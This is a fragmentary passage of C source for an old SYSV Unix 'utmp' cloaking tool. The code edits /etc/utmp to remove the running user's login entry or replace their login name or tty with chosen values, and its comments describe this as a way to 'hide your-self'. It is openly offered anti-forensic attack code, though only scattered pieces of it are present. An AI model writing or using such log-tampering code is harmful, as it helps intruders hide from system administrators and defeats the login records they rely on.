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ipped SYSV KUTMP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t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yt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ackup_utmp = "cp /etc/utmp /tmp/utmp.ba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tmp *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ood= 0,cnt = 0,start = 1,cn = 0, cl = 0,inde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err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rgc &gt;= 2) cn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rgc == 3) c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backup_u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Status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cn == 1) printf("Changing your login to %s\n"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cl == 1) printf("Changing your tty   to %s\n",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cl == 0 &amp;&amp; cn == 0) printf("Removing you from utmp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pname("/etc/ut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ty = strrchr(ttyname(0),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mytty,++myt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good !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= getut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rcmp(user-&gt;ut_line,mytty) == 0) good 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pname("/etc/ut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start = 0;start &lt; cnt;start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= getut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rgc == 1)  user-&gt;ut_type = LOGIN_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user-&gt;ut_type = USER_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Bove: You can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&gt;ut_type = LOGIN_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user-&gt;ut_name,"LOG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hide your-self.  On some systems, if you do it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login process... But that is rare.  AT any-rate, for safety, i left out the strc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argc == 2) strcpy(user-&gt;ut_name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argc == 3) strcpy(user-&gt;ut_line,argv[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utline(us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t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 to Continu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